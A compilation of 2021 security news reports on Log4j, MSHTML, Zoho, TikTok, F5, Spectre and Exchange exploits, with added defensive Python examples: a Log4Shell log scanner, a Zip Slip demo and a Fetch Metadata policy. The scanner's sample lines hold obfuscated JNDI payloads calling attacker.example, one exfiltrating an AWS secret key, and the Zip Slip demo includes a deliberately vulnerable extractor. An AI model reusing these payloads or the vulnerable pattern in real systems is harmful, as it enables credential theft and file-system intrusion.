

Hackers Begin Exploiting Second Log4j Vulnerability as a Third Flaw Emerges
20.12.2021 
Exploit Thehackernews
Web infrastructure company Cloudflare on Wednesday revealed that threat actors are actively attempting to exploit a second bug disclosed in the widely used Log4j logging utility, making it imperative that customers move quickly to install the latest version as a barrage of attacks continues to pummel unpatched systems with a variety of malware.

The new vulnerability, assigned the identifier CVE-2021-45046, makes it possible for adversaries to carry out denial-of-service (DoS) attacks and follows disclosure from the Apache Software Foundation (ASF) that the original fix for the remote code execution bug — CVE-2021-44228 aka Log4Shell — was "incomplete in certain non-default configurations." The issue has since been addressed in Log4j version 2.16.0.
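
As an added example of the detection side of this story (it is not code from Cloudflare, Apache or the original article), here is a small Python scanner for the lookup syntax at the heart of Log4Shell. It goes a little beyond the article: rather than matching the literal string `${jndi:`, it folds the nested lookups attackers used to hide that string from naive pattern matches (`${lower:j}`, `${::-j}`, `${env:X:-j}`) and reports any JNDI lookup that is left standing. Only the lookups needed for that are emulated; every other lookup is treated as resolving to nothing. The log lines, host names and addresses it scans are constructed for the example.

```python
import re
from typing import List, Tuple

# Innermost ${...} expression: nothing inside the braces opens or closes another one.
_INNER = re.compile(r"\$\{([^{}]*)\}")
# A JNDI lookup that survived normalization, e.g. ${jndi:ldap://host/x}.
_JNDI = re.compile(r"\$\{\s*jndi\s*:[^}]*\}", re.IGNORECASE)


def _resolve(body: str) -> str:
    """Return the text Log4j would substitute for ${body}.

    Only the handful of lookups attackers use to hide the string 'jndi'
    are emulated. A JNDI lookup itself is kept verbatim so the caller can
    still see it once everything nested inside or around it is resolved.
    """
    body = body.strip()
    low = body.lower()
    if low.startswith("jndi:"):
        return "${" + body + "}"
    if low.startswith("lower:"):
        return body[len("lower:"):].lower()
    if low.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        # ${name:-default} and the ${::-x} trick: the lookup fails, the default is used.
        return body.split(":-", 1)[1]
    # Any other lookup (env, sys, ctx, date, ...) is treated as resolving to
    # nothing, which collapses an obfuscated payload onto its literal parts.
    return ""


def normalize(line: str, max_rounds: int = 32) -> str:
    """Resolve innermost lookups repeatedly until the line stops changing."""
    for _ in range(max_rounds):
        resolved = _INNER.sub(lambda m: _resolve(m.group(1)), line)
        if resolved == line:
            break
        line = resolved
    return line


def find_jndi(line: str) -> List[str]:
    """Return every JNDI lookup present in the line after de-obfuscation."""
    return _JNDI.findall(normalize(line))


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """(line number, normalized lookup) for each hit in a batch of log lines."""
    return [(n, expr) for n, line in enumerate(lines, 1) for expr in find_jndi(line)]


# Constructed access-log lines; the User-Agent field is where most payloads were seen.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:00 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:L}dap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/b}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 "-" "${${env:NO_SUCH_VAR:-j}ndi:dns://attacker.example/c}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://attacker.example/${env:AWS_SECRET_ACCESS_KEY}}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:06 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 "-" "curl/7.79"',
]


if __name__ == "__main__":
    for number, expr in scan(SAMPLE_LOG):
        print(f"line {number}: {expr}")
```

Point it at any log that was, or might have been, handed to Log4j for formatting (access logs, application logs, headers captured at a proxy). Because unknown lookups are treated as empty, the scanner flags attempts regardless of whether the receiving version would have executed them, which is the right trade for a detection signal; the sixth sample line shows why the nested-lookup case matters, since an environment variable spliced into the LDAP URL is how data leaves the host.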

"This vulnerability is actively being exploited and anyone using Log4j should update to version 2.16.0 as soon as possible, even if you have previously updated to 2.15.0," Cloudflare's Andre Bluehs and Gabriel Gabor said.

Even more troublingly, researchers at security firm Praetorian warned of a third separate security weakness in Log4j version 2.15.0 that can "allow for exfiltration of sensitive data in certain circumstances." Additional technical details of the flaw have been withheld to prevent further exploitation, but it's not immediately clear whether this has already been addressed in version 2.16.0.

"2.16 disables JNDI lookups by default and — as a result — is the safest version of Log4j2 that we're aware of," Anthony Weems, principal security engineer at Praetorian, told The Hacker News. When reached for a response, the Apache Logging Services Project Management Committee (PMC) confirmed that "We have been in contact with the engineer from Praetorian to fully understand the nature and scope of the problem."

The latest development comes as advanced persistent threat groups from China, Iran, North Korea, and Turkey, counting the likes of Hafnium and Phosphorus, have jumped into the fray to operationalize the vulnerability, discovering and exploiting as many susceptible systems as possible for follow-on attacks. Over 1.8 million attempts to exploit the Log4j vulnerability have been recorded so far.

Microsoft Threat Intelligence Center (MSTIC) said it also observed access brokers leveraging the Log4Shell flaw to gain initial access to target networks that were then sold to other ransomware affiliates. In addition, dozens of malware families that run the gamut from cryptocurrency coin miners and remote access trojans to botnets and web shells have been identified taking advantage of this shortcoming to date.

While it's common for threat actors to make efforts to exploit newly disclosed vulnerabilities before they're remediated, the Log4j flaw underscores the risks arising from software supply chains when a key piece of software is used within a broad range of products across several vendors and deployed by their customers around the world.

"This cross-cutting vulnerability, which is vendor-agnostic and affects both proprietary and open-source software, will leave a wide swathe of industries exposed to remote exploitation, including electric power, water, food and beverage, manufacturing, transportation, and more," industrial cybersecurity firm Dragos noted.

"As network defenders close off more simplistic exploit paths and advanced adversaries incorporate the vulnerability in their attacks, more sophisticated variations of Log4j exploits will emerge with a higher likelihood of directly impacting Operational Technology networks," the company added.


Windows MSHTML 0-Day Exploited to Deploy Cobalt Strike Beacon in Targeted Attacks
19.9.21 
Exploit  Thehackernews

Microsoft on Wednesday disclosed details of a targeted phishing campaign that leveraged a now-patched zero-day flaw in its MSHTML platform using specially-crafted Office documents to deploy Cobalt Strike Beacon on compromised Windows systems.

"These attacks used the vulnerability, tracked as CVE-2021-40444, as part of an initial access campaign that distributed custom Cobalt Strike Beacon loaders," Microsoft Threat Intelligence Center said in a technical write-up. "These loaders communicated with an infrastructure that Microsoft associates with multiple cybercriminal campaigns, including human-operated ransomware."

Details about CVE-2021-40444 (CVSS score: 8.8) first emerged on September 7 after researchers from EXPMON alerted the Windows maker about a "highly sophisticated zero-day attack" aimed at Microsoft Office users. The attack takes advantage of a remote code execution vulnerability in MSHTML (aka Trident), the proprietary browser engine built for the now-discontinued Internet Explorer, which Office also uses to render web content inside Word, Excel, and PowerPoint documents.

"The observed attack vector relies on a malicious ActiveX control that could be loaded by the browser rendering engine using a malicious Office document," the researchers noted. Microsoft has since rolled out a fix for the vulnerability as part of its Patch Tuesday updates a week later on September 14.

The Redmond-based tech giant attributed the activities to related cybercriminal clusters it tracks as DEV-0413 and DEV-0365, the latter of which is the company's moniker for the emerging threat group associated with creating and managing the Cobalt Strike infrastructure used in the attacks. The earliest exploitation attempt by DEV-0413 dates back to August 18.

The exploit delivery mechanism originates from emails impersonating contracts and legal agreements hosted on file-sharing sites. Opening the malware-laced document leads to the download of a Cabinet archive file containing a DLL bearing an INF file extension that, when decompressed, leads to the execution of a function within that DLL. The DLL, in turn, retrieves remotely hosted shellcode — a custom Cobalt Strike Beacon loader — and loads it into the Microsoft address import tool.

Additionally, Microsoft said some of the infrastructure that DEV-0413 used to host the malicious artifacts was also involved in the delivery of BazaLoader and Trickbot payloads, a separate set of activities the company monitors under the codename DEV-0193 (and that Mandiant tracks as UNC1878).

"At least one organization that was successfully compromised by DEV-0413 in their August campaign was previously compromised by a wave of similarly-themed malware that interacted with DEV-0365 infrastructure almost two months before the CVE-2021-40444 attack," the researchers said. "It is currently not known whether the retargeting of this organization was intentional, but it reinforces the connection between DEV-0413 and DEV-0365 beyond sharing of infrastructure."

In an independent investigation, Microsoft's RiskIQ subsidiary attributed the attacks with high confidence to a ransomware syndicate known as Wizard Spider aka Ryuk, noting that the network infrastructure employed to provide command-and-control to the Cobalt Strike Beacon implants spanned more than 200 active servers.

"The association of a zero-day exploit with a ransomware group, however remote, is troubling," RiskIQ researchers said. "It suggests either that turnkey tools like zero-day exploits have found their way into the already robust ransomware-as-a-service (RaaS) ecosystem or that the more operationally sophisticated groups engaged in traditional, government-backed espionage are using criminally controlled infrastructure to misdirect and impede attribution."


CISA Warns of Actively Exploited Zoho ManageEngine ADSelfService Vulnerability
10.9.21 
Exploit  Thehackernews
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Wednesday issued a bulletin warning of a zero-day flaw affecting Zoho ManageEngine ADSelfService Plus deployments that is currently being actively exploited in the wild.

The flaw, tracked as CVE-2021-40539, concerns a REST API authentication bypass that could lead to arbitrary remote code execution (RCE). ADSelfService Plus builds up to 6113 are impacted.

ManageEngine ADSelfService Plus is an integrated self-service password management and single sign-on solution for Active Directory and cloud apps; it lets admins enforce two-factor authentication for application logins and lets users reset their own passwords.

"CVE-2021-40539 has been detected in exploits in the wild. A remote attacker could exploit this vulnerability to take control of an affected system," CISA said, urging companies to apply the latest security update to their ManageEngine servers and "ensure ADSelfService Plus is not directly accessible from the internet."

In an independent advisory, Zoho cautioned that it's a "critical issue" and that it's "noticing indications of this vulnerability being exploited."

"This vulnerability allows an attacker to gain unauthorized access to the product through REST API endpoints by sending a specially crafted request," the company said. "This would allow the attacker to carry out subsequent attacks resulting in RCE."

CVE-2021-40539 is the fifth security weakness disclosed in ManageEngine ADSelfService Plus since the start of the year, three of which — CVE-2021-37421 (CVSS score: 9.8), CVE-2021-37417 (CVSS score: 9.8), and CVE-2021-33055 (CVSS score: 9.8) — were addressed in recent updates. A fourth vulnerability, CVE-2021-28958 (CVSS score: 9.8), was rectified in March 2021.

This development also marks the second time a flaw in Zoho enterprise products has been actively exploited in real-world attacks. In March 2020, APT41 actors were found leveraging an RCE flaw in ManageEngine Desktop Central (CVE-2020-10189, CVSS score: 9.8) to download and execute malicious payloads in corporate networks as part of a global intrusion campaign.


TikTok Pays Out $11,000 Bounty for High-Impact Exploit

23.3.2021 Exploit  Securityweek

A researcher has earned over $11,000 from TikTok after disclosing a series of vulnerabilities that could have been chained for a high-impact 1-click exploit.

In a blog post published on Medium last week, Sayed Abdelhafiz, an 18-year-old researcher from Egypt, disclosed the details of several vulnerabilities he identified late last year and in early 2021 in the TikTok app for Android.

Abdelhafiz discovered a couple of cross-site scripting (XSS) vulnerabilities, an issue related to starting arbitrary components, and a so-called Zip Slip archive extraction vulnerability. Chaining these vulnerabilities could have allowed an attacker to remotely execute arbitrary code on the targeted user’s Android device simply by convincing them to click on a malicious link.
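
The Zip Slip bug in that chain is the one piece that can be shown compactly. The following is an added example, not the researcher's proof-of-concept or TikTok's code: a Python script that builds a constructed archive containing a `../../` entry, extracts it once with a naive extractor that trusts entry names (the Zip Slip pattern) and once with a hardened extractor that resolves every entry and refuses anything that lands outside the destination directory. The directory layout and archive contents are constructed for the example.

```python
import io
import os
import tempfile
import zipfile
from pathlib import Path
from typing import Dict, List


def build_malicious_zip() -> bytes:
    """Constructed sample archive: one legitimate entry plus a Zip Slip entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("sticker/pack.json", '{"name": "demo"}')
        # The entry name carries '../', so a naive extractor writes above the target dir.
        zf.writestr("../../escaped.txt", "written outside the extraction directory")
    return buf.getvalue()


def extract_naive(data: bytes, dest: Path) -> List[Path]:
    """Vulnerable extractor: joins the entry name onto dest without checking it."""
    written = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            target = Path(os.path.normpath(dest / info.filename))  # '../' is honoured
            if info.is_dir():
                target.mkdir(parents=True, exist_ok=True)
                continue
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(zf.read(info))
            written.append(target)
    return written


def extract_safe(data: bytes, dest: Path) -> List[Path]:
    """Hardened extractor: every entry must resolve to a path inside dest.

    All names are validated before anything is written, so one bad entry
    anywhere in the archive rejects the whole archive.
    """
    dest = dest.resolve()
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        planned = []
        for info in zf.infolist():
            # An absolute entry name replaces dest entirely; resolve() also
            # collapses '..' so both traversal styles end up outside dest.
            target = (dest / info.filename).resolve()
            if target != dest and dest not in target.parents:
                raise ValueError(f"Zip Slip attempt blocked: {info.filename!r}")
            planned.append((info, target))
        written = []
        for info, target in planned:
            if info.is_dir():
                target.mkdir(parents=True, exist_ok=True)
                continue
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(zf.read(info))
            written.append(target)
    return written


def demo() -> Dict[str, bool]:
    """Run both extractors against the sample archive in a scratch tree and report."""
    data = build_malicious_zip()
    report: Dict[str, bool] = {}
    for name, extractor in (("naive", extract_naive), ("safe", extract_safe)):
        with tempfile.TemporaryDirectory() as tmp:
            root = Path(tmp)
            dest = root / "app" / "files"  # two levels down so '../../' stays inside tmp
            dest.mkdir(parents=True)
            try:
                extractor(data, dest)
                report[f"{name}_raised"] = False
            except ValueError:
                report[f"{name}_raised"] = True
            report[f"{name}_escaped"] = (root / "escaped.txt").exists()
            report[f"{name}_wrote_legit"] = (dest / "sticker" / "pack.json").exists()
    return report


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Python's own `ZipFile.extractall` already strips `..` components, which is why the naive version has to copy bytes by hand to reproduce the bug; the Java `ZipEntry.getName()` plus `new File(dir, name)` idiom common in Android code has no such protection, and that is the pattern Zip Slip exploits. The check is done on fully resolved paths so that symlinked temp directories do not produce false rejections.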

Abdelhafiz told SecurityWeek that it was enough for the victim to click on a link posted on a website or sent to their TikTok inbox.

As for what an attacker could have done with this exploit, the researcher said “anything TikTok can do on your device, the exploit can do.”

“If the victim has given the storage permission to the TikTok application, the exploit can access the storage's files,” Abdelhafiz explained. “If bad people exploit this vulnerability, they may chain it with an Android vulnerability to take over the whole device, even if the TikTok app doesn't have permission to do anything.”

Abdelhafiz told SecurityWeek that TikTok acted quickly and rolled out a temporary fix within a week, but the social media giant only allowed him to disclose details of his findings last week.

The researcher’s blog post contains proof-of-concept (PoC) code, as well as information on how TikTok addressed the vulnerabilities.

TikTok launched its public bug bounty program in collaboration with HackerOne in October 2020. On its HackerOne page, the company says it has paid out nearly $130,000 to date, with top bounties ranging between $2,000 and $12,000.


Critical F5 BIG-IP Bug Under Active Attacks After PoC Exploit Posted Online
21.3.2021
Exploit  Thehackernews

Almost 10 days after application security company F5 Networks released patches for critical vulnerabilities in its BIG-IP and BIG-IQ products, adversaries have begun opportunistically mass scanning and targeting exposed and unpatched networking devices to break into enterprise networks.

News of in-the-wild exploitation comes on the heels of proof-of-concept exploit code that surfaced online earlier this week, developed by reverse-engineering the Java software patch in BIG-IP. The mass scans are said to have spiked since March 18.

The flaws affect BIG-IP versions 11.6 or 12.x and newer, with a critical remote code execution (CVE-2021-22986) also impacting BIG-IQ versions 6.x and 7.x. CVE-2021-22986 (CVSS score: 9.8) is notable for the fact that it's an unauthenticated, remote command execution vulnerability affecting the iControl REST interface, allowing an attacker to execute arbitrary system commands, create or delete files, and disable services without the need for any authentication.

Successful exploitation of these vulnerabilities could lead to a full compromise of susceptible systems, including the possibility of remote code execution, as well as triggering a buffer overflow that leads to a denial-of-service (DoS) condition.

While F5 said it wasn't aware of any public exploitation of these issues on March 10, researchers from NCC Group said they have now found evidence of "full chain exploitation of F5 BIG-IP/BIG-IQ iControl REST API vulnerabilities CVE-2021-22986" in the wake of multiple exploitation attempts against its honeypot infrastructure.

Additionally, Palo Alto Networks' Unit 42 threat intelligence team said it found attempts to exploit CVE-2021-22986 to install a variant of the Mirai botnet. But it's not immediately clear if those attacks were successful.

Given the popularity of BIG-IP/BIG-IQ in corporate and government networks, it should come as no surprise that this is the second time in a year F5 appliances have become a lucrative target for exploitation.

Last July, the company addressed a similar critical flaw (CVE-2020-5902), following which it was abused by Iranian and Chinese state-sponsored hacking groups, prompting the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to issue an alert cautioning of a "broad scanning activity for the presence of this vulnerability across federal departments and agencies."

"The bottom line is that [the flaws] affect all BIG-IP and BIG-IQ customers and instances — we urge all customers to update their BIG-IP and BIG-IQ deployments to the fixed versions as soon as possible," F5 Senior Vice President Kara Sprague noted last week.


Google Releases Spectre PoC Exploit For Chrome

17.3.2021 Exploit  Threatpost

Google has released the side-channel exploit in hopes of motivating web-application developers to protect their sites.

Google has released proof-of-concept (PoC) exploit code, which leverages the Spectre attack against the Chrome browser to leak data from websites.

Three years after the Spectre attack was first disclosed, researchers with Google have now released a demonstration website that leverages the attack, written in JavaScript, to leak data at a speed of 1 kilobyte per second (kB/s) when running on Chrome 88 on an Intel Skylake CPU.

The researchers said they hope the PoC will light a fire under web application developers to take active steps to protect their sites.

“Today, we’re sharing proof-of-concept (PoC) code that confirms the practicality of Spectre exploits against JavaScript engines,” said Stephen Röttger and Artur Janc, information security engineers with Google, on Friday. “We use Google Chrome to demonstrate our attack, but these issues are not specific to Chrome, and we expect that other modern browsers are similarly vulnerable to this exploitation vector.”

Spectre and Speculative-Execution Attacks
The Spectre (CVE-2017-5753 and CVE-2017-5715) and Meltdown (CVE-2017-5754) flaws rocked the silicon industry when the vulnerabilities were made public in early 2018. These vulnerabilities derive from a process called speculative execution in processors. It is used in microprocessors so that memory can be read before the addresses of all prior memory writes are known; an attacker with local user access can use side-channel analysis to gain unauthorized disclosure of information.

What originally set Spectre apart was its sheer breadth in terms of affected devices: the attack impacted many modern processors, including those made by Intel and AMD, as well as major operating systems like Android, ChromeOS, Linux, macOS and Windows. One variant, Variant 1 (CVE-2017-5753), also applies to JavaScript exploitation against browsers.

At the same time, after the public disclosure of Spectre, hardware and software manufacturers, as well as browser-makers, released various mitigations against the attacks.

The Spectre PoC Exploit
At a high level, the PoC consists of a Spectre "gadget," or code, that triggers attacker-controlled transient execution, and a side channel that serves as a method for attackers to observe the side effects of this transient execution (and thus view various sensitive data, which could include passwords stored in a browser, personal photos, emails, instant messages and even business-critical documents). A video demo of the PoC can be viewed below.

The PoC builds on 2018 research from the team behind the V8 JavaScript engine. The research shows that one potential mitigation of Spectre, reduced timer granularity, does not sufficiently mitigate against the attack. That's because attackers can amplify timing differences in order to increase the odds of capturing sensitive data, according to the research.

However, that amplification technique relied on reading the sensitive data multiple times, which Google researchers argued can reduce the effectiveness of the attack if the information leak is subject to chance variation.

Researchers with Google said they overcame this limitation with their new PoC. The new method relies on Tree-PLRU, a cache replacement (eviction) policy used in many CPUs: "By abusing the behavior of the Tree-PLRU cache eviction strategy commonly found in modern CPUs, we were able to significantly amplify the cache timing with a single read of secret data," said researchers. "This allowed us to leak data efficiently even with low precision timers."

Researchers said they don’t believe the PoC can be re-used for nefarious purposes “without significant modifications” – however, they hope that the release of the PoC “provides a clear signal for web-application developers that they need to consider this risk in their security evaluations and take active steps to protect their sites.”

This is especially needed as Spectre exploits continue to pop up; working Windows and Linux Spectre exploits were uploaded to VirusTotal earlier this month, for instance.

Such protections could include implementing cross-origin resource policy (CORP) and fetch metadata request headers, allowing developers to control which sites can embed their resources and preventing data from being delivered to an attacker-controlled browser.
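
The resource isolation policy that last paragraph refers to, as an added example that is neither Google's code nor part of the original article: a Python request handler that reads the Fetch Metadata request headers (Sec-Fetch-Site, Sec-Fetch-Mode, Sec-Fetch-Dest) and refuses cross-site subresource requests before any private bytes are produced, then sets Cross-Origin-Resource-Policy on what it does serve as a second layer. The point, in Spectre terms, is that a response the server never sends cannot be read out of the attacker's renderer process. The `Request` class and the sample requests are constructed for the example.

```python
from dataclasses import dataclass, field
from typing import Dict, Tuple


@dataclass
class Request:
    """Minimal stand-in for a framework request object (constructed for the example)."""
    method: str
    path: str
    headers: Dict[str, str] = field(default_factory=dict)

    def header(self, name: str) -> str:
        # Header names are case-insensitive on the wire.
        for key, value in self.headers.items():
            if key.lower() == name.lower():
                return value
        return ""


def is_request_allowed(req: Request) -> bool:
    """Resource Isolation Policy based on Fetch Metadata request headers.

    The goal is that a cross-site page can never pull this site's private
    responses into its own renderer process, where Spectre could read them.
    """
    site = req.header("Sec-Fetch-Site")
    # Browsers that do not send Fetch Metadata keep the pre-existing behaviour.
    if site == "":
        return True
    # Requests from our own origin or site, or typed into the address bar.
    if site in ("same-origin", "same-site", "none"):
        return True
    # Cross-site: allow only plain top-level GET navigations, which land the
    # response in a new document rather than inside the attacker's page.
    # <object> and <embed> also report mode=navigate but load into the embedder.
    if (req.header("Sec-Fetch-Mode") == "navigate"
            and req.method.upper() == "GET"
            and req.header("Sec-Fetch-Dest") not in ("object", "embed")):
        return True
    # Everything else cross-site: img, script, no-cors fetch, XHR, form POSTs...
    return False


def handle(req: Request) -> Tuple[int, Dict[str, str], str]:
    """Apply the policy, then mark what is served with CORP as a second layer."""
    vary = {"Vary": "Sec-Fetch-Site, Sec-Fetch-Mode, Sec-Fetch-Dest"}
    if not is_request_allowed(req):
        return 403, vary, "cross-site request rejected"
    headers = dict(vary)
    # Even if this response is cached or the check above is bypassed, CORP
    # tells the browser not to hand a cross-site no-cors load to another site.
    headers["Cross-Origin-Resource-Policy"] = "same-site"
    return 200, headers, f"private contents of {req.path}"


# Constructed sample requests, labelled as a browser would label them.
SAMPLE_REQUESTS = {
    "same_origin_xhr": Request("GET", "/api/messages", {
        "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Dest": "empty"}),
    "cross_site_img": Request("GET", "/api/messages", {
        "Sec-Fetch-Site": "cross-site", "Sec-Fetch-Mode": "no-cors", "Sec-Fetch-Dest": "image"}),
    "cross_site_fetch": Request("GET", "/api/messages", {
        "Sec-Fetch-Site": "cross-site", "Sec-Fetch-Mode": "no-cors", "Sec-Fetch-Dest": "empty"}),
    "cross_site_link": Request("GET", "/inbox", {
        "Sec-Fetch-Site": "cross-site", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Dest": "document"}),
    "cross_site_embed": Request("GET", "/inbox", {
        "Sec-Fetch-Site": "cross-site", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Dest": "embed"}),
    "cross_site_form_post": Request("POST", "/inbox", {
        "Sec-Fetch-Site": "cross-site", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Dest": "document"}),
    "legacy_browser": Request("GET", "/api/messages", {}),
}


def evaluate_samples() -> Dict[str, int]:
    """Status code the handler returns for each constructed request."""
    return {name: handle(req)[0] for name, req in SAMPLE_REQUESTS.items()}


if __name__ == "__main__":
    for name, status in evaluate_samples().items():
        print(f"{name}: {status}")
```

The 403 body that a rejected cross-site `<img>` load does receive is a constant, so nothing secret enters the attacker's process. Cross-site `<iframe>` loads report `mode=navigate` and are still allowed here; framing is the job of X-Frame-Options or a frame-ancestors CSP, which this policy does not replace. The `Vary` header keeps a shared cache from replaying a same-site 200 to a later cross-site request.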


Is there a link between Microsoft Exchange exploits and PoC code the company shared with partner security firms?
17.3.2021
Exploit  Securityaffairs

Microsoft is reportedly investigating whether the recent attacks against Microsoft Exchange servers could be linked to information leaked by a partner security firm.
According to a report published by The Wall Street Journal, Microsoft is investigating whether the threat actors behind the recent wave of attacks on Microsoft Exchange servers worldwide may have obtained sensitive information to launch the attack from a partner security firm.

The information may have been obtained through “private disclosures it [Microsoft] made with some of its security partners.”

On March 2nd, Microsoft released emergency out-of-band security updates that address four zero-day issues (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) in all supported MS Exchange versions that are actively exploited in the wild.

The IT giant reported that at least one China-linked APT group, tracked as HAFNIUM, chained these vulnerabilities to break into on-premises Exchange servers, access email accounts, and install backdoors to maintain access to victim environments.

According to Microsoft, the Hafnium APT exploited these vulnerabilities in targeted attacks against US organizations. The group historically launched cyber espionage campaigns aimed at US-based organizations in multiple industries, including law firms and infectious disease researchers.

In past campaigns, HAFNIUM attackers also interacted with victim Office 365 tenants.
Microsoft is aware that the attacks began in early January, before the company was able to address the flaws with the release of security updates. Several China-linked APT groups obtained the exploit code and used it to target Microsoft Exchange email servers worldwide.

“Microsoft Corp. is investigating whether the hackers behind a world-wide cyberattack may have obtained sensitive information necessary to launch the attack from private disclosures it made with some of its security partners, according to people familiar with the matter.” reads the article published by The Wall Street Journal. “Investigators have focused on whether a Microsoft partner with whom it shared information about the bug hackers were exploiting leaked it to other groups, either inadvertently or on purpose, the people said.”

On March 2, Microsoft issued emergency patches to tackle four zero-day vulnerabilities in Microsoft Exchange Server which were being actively exploited in the wild.

The vulnerabilities were privately disclosed in January, but evidently, someone obtained the information about the flaws and started exploiting them in the wild.

Microsoft suspects that the code used in the attacks was obtained from the PoC code it has privately sent to partners of the Microsoft Active Protections Program (Mapp), it is not clear whether it was deliberately or accidentally leaked.

PoC exploit code was sent to partner cybersecurity and antivirus firms on February 23, before the Redmond giant released the patches. Experts noticed that the exploit code used in the attacks in the wild was similar to the PoC shared by Microsoft.

“Some of the tools used in the second wave of the attack, which is believed to have begun on Feb. 28, bear similarities to “proof of concept” attack code that Microsoft distributed to antivirus companies and other security partners on Feb. 23, investigators at security companies say.” continues the WSJ.

Mapp includes about 80 security companies worldwide, 10 of which are based in China. Some of the Mapp partners received the PoC code on February 23, according to sources familiar with the program. At the time of this writing, Microsoft has yet to confirm whether any Chinese companies received the code.

It is not the first time such a leak has happened: in May 2012, Microsoft cut off Hangzhou DPtech Technologies Co. Ltd., a MAPP partner company based in China, for leaking data related to CVE-2012-0002.

The investigation is still ongoing, but the public availability of multiple PoC exploits is causing a surge of cyber attacks exploiting ProxyLogon vulnerabilities on a global scale.


Over 80,000 Exchange Servers Still Affected by Actively Exploited Vulnerabilities
16.3.2021 Exploit  Securityweek

Roughly 80,000 Exchange servers have yet to receive patches for the actively exploited vulnerabilities, Microsoft says.

The bugs were publicly disclosed on March 2, when the Redmond-based tech giant announced not only patches for them, but also the fact that a Chinese threat actor had been actively exploiting them in attacks.

Within days, security researchers revealed that multiple adversaries were quick to pick up exploits for the Exchange bugs, but also that some had been targeting the flaws even before patches were released. The first known exploitation attempt is dated January 3, 58 days before public disclosure.

Over the course of last week, Microsoft released additional fixes for these vulnerabilities, including security updates (SUs) for older Exchange Server Cumulative Updates (CUs) that are no longer supported.

“This is intended only as a temporary measure to help you protect vulnerable machines right now. You still need to update to the latest supported CU and then apply the applicable SUs,” Microsoft said.

With the latest set of released updates, more than 95% of the Exchange Server versions that are exposed to the Internet are covered, yet tens of thousands of machines remain vulnerable. Microsoft revealed that, as of March 12, more than 82,000 Exchange servers were still left to be updated (out of 400,000 identified on March 1).

Last week, ESET reported that more than 10 threat actors were observed targeting vulnerable Exchange servers. Ransomware operators also started targeting the flaws, and the overall number of attacks aimed at the Exchange zero-days grew exponentially over the course of several days only.

On Sunday, security researchers at Check Point pointed out that "the number of exploitation attempts multiplied by more than 6 times" within "the past 72 hours alone," adding that they had identified more than 4,800 exploit attempts and hundreds of compromised organizations worldwide.

The United States was being targeted the most, accounting for 21% of all exploitation attempts, followed by the Netherlands and Turkey, both at 12%. According to Check Point, government/military was the sector being targeted the most (27% of attempts), followed by manufacturing (22%) and software (9%).

“As we enter the second week since the vulnerabilities became public, initial estimates place the number of compromised organizations in the tens of thousands,” Palo Alto Networks said last week.

In a timeline of the attacks, the security firm revealed that the first two bugs were identified on December 10 and 30, 2020, respectively, and reported to Microsoft on January 5, 2021. A third security hole was identified and reported while already under attack, on January 27.

“Ongoing research illustrates that these vulnerabilities are being used by multiple threat groups. While it is not new for highly skilled attackers to leverage new vulnerabilities across varying product ecosystems, the ways in which these attacks are conducted to bypass authentication — thereby providing unauthorized access to emails and enabling remote code execution (RCE) — is particularly nefarious,” Palo Alto Networks noted.

Microsoft published additional information on how organizations can protect their on-premises Exchange servers against exploitation, reiterating that applying the available patches represents the first step, followed by identifying possibly compromised systems and removing them from the network.


ProxyLogon Microsoft Exchange exploit is completely out of the bag by now
15.3.2021
Exploit  Securityaffairs

A security researcher released a new PoC exploit for ProxyLogon issues that could be adapted to install web shells on vulnerable Microsoft Exchange servers.
A security researcher has released a new proof-of-concept exploit that could be adapted to install web shells on Microsoft Exchange servers vulnerable to the ProxyLogon issues.

Since the disclosure of the flaws, security experts have observed a surge in attacks against Microsoft Exchange mail servers worldwide.

The Check Point Research team reported that within a span of 24 hours the number of exploitation attempts doubled every two to three hours.
"CPR has seen hundreds of exploit attempts against organizations worldwide," reads the post published by Check Point. "In the past 24 hours alone, CPR has observed that the number of exploitation attempts on organizations it tracks doubled every two to three hours."

Most exploit attempts targeted organizations in Turkey (19%), followed by the United States (18%) and Italy (10%). The most targeted sectors have been Government/Military (17% of all exploit attempts), followed by Manufacturing (14%) and Banking (11%).
Security experts pointed out that the flaws are actively exploited to deliver web shells, and more recently ransomware such as the DearCry ransomware.
Last week, the independent security researcher Nguyen Jang published on GitHub a proof-of-concept tool to hack Microsoft Exchange servers. The tool chains two of the ProxyLogon vulnerabilities recently addressed by Microsoft.


The availability of the proof-of-concept code was first reported by The Record.

A few hours after the publication, GitHub took down the PoC hacking tool because it posed a threat to Microsoft’s customers using the Microsoft Exchange solution.
Jang explained that he published the PoC code to raise the alert on the recent wave of hacks and to give colleagues the opportunity to study the code used in the attacks.
Experts at Praetorian published a detailed technical analysis of the exploit for the Microsoft Exchange flaws: they reverse-engineered the CVE-2021-26855 patch and developed a fully functioning end-to-end exploit.

